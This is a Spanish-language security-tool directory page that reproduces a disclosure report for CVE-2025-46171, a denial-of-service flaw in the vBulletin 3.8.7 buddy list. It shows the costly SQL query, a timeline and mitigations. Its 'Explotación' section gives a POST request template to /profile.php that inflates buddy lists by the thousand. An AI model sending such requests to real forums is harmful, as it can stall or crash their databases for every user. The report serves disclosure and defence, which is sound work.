Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-46171 — Informe de una vulnerabilidad de Denegación de Servicio en la lista de amigos de vBulletin 3.8.7. | Kitploit
Herramientas/GitHubGitHub/oiyl/cve-2025-46171
Análisis de VulnerabilidadesExplotación de Aplicaciones WebPruebas de PenetraciónMala ConfiguraciónSeguridad de Bases de DatosArchived
GitHuboiyl/cve-2025-46171

CVE-2025-46171

Informe de una vulnerabilidad de Denegación de Servicio en la lista de amigos de vBulletin 3.8.7.

Ver Repositorio
4hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

vBulletin 3.x.x - DoS mediante sobrecarga de la lista de amigos

Resumen

El endpoint /misc.php?do=buddylist ejecuta una única consulta JOIN grande que recupera todos los amigos junto con su información de usuario y sesión para verificar el estado en línea. Debido a que esta consulta procesa toda la lista de amigos sin paginación ni límites de resultados, se vuelve extremadamente intensiva en recursos y puede sobrecargar la base de datos cuando la lista crece.

Este problema es fácil de explotar y requiere una configuración mínima. No se necesitan privilegios especiales más allá de una cuenta de usuario básica. Simplemente inflar la lista de amigos es suficiente para ejercer una gran presión sobre la base de datos.

Versiones afectadas

  • ✅ Confirmado vulnerable: vBulletin 3.8.7

Detalles técnicos

Esta consulta SQL recupera los detalles de los amigos junto con la información de la sesión para verificar el estado en línea de cada amigo. Debido a que procesa toda la lista de amigos y se combina con los datos de sesión para cada entrada, la consulta se vuelve muy grande y consume muchos recursos.

root@kitploit:~
$buddys = $db->query_read_slave("
    SELECT
        user.username,
        (user.options & " . $vbulletin->bf_misc_useroptions['invisible'] . ") AS invisible,
        user.userid,
        session.lastactivity
    FROM " . TABLE_PREFIX . "userlist AS userlist
    LEFT JOIN " . TABLE_PREFIX . "user AS user ON (user.userid = userlist.relationid)
    LEFT JOIN " . TABLE_PREFIX . "session AS session ON (session.userid = user.userid)
    WHERE userlist.userid = {$vbulletin->userinfo['userid']}
        AND userlist.relationid = user.userid
        AND type = 'buddy'
    ORDER BY username ASC, session.lastactivity DESC
");

Cronología

  • 17 de abril de 2025: Vulnerabilidad descubierta
  • 18 de abril de 2025: Solicitud de CVE enviada a MITRE
  • 29 de mayo de 2025: CVE-2025-46171 asignado
  • 27 de junio de 2025: Divulgación pública

Explotación

Añadir amigos en masa

Se pueden poblar listas masivas de amigos mediante una solicitud POST a /profile.php con listbits. Esto se puede repetir para miles de ID de usuario para inflar la lista de amigos:

root@kitploit:~
POST /profile.php HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded

securitytoken=TOKEN
&ajax=1
&do=updatelist
&userlist=buddy
&listbits[buddy_original][USER_ID]=USER_ID
&listbits[buddy][USER_ID]=USER_ID
&listbits[friend][USER_ID]=USER_ID
&listbits[friend_original][USER_ID]=USER_ID
...

Impacto

En foros grandes, esto puede causar un retraso severo en las consultas o incluso bloquear la instancia de MySQL por completo.

Mitigación:

  • Aplicar paginación de consultas o limitar el número de entradas de amigos recuperadas por solicitud
  • Aplicar limitación de velocidad y validación en las modificaciones de la lista de amigos
Descargar herramienta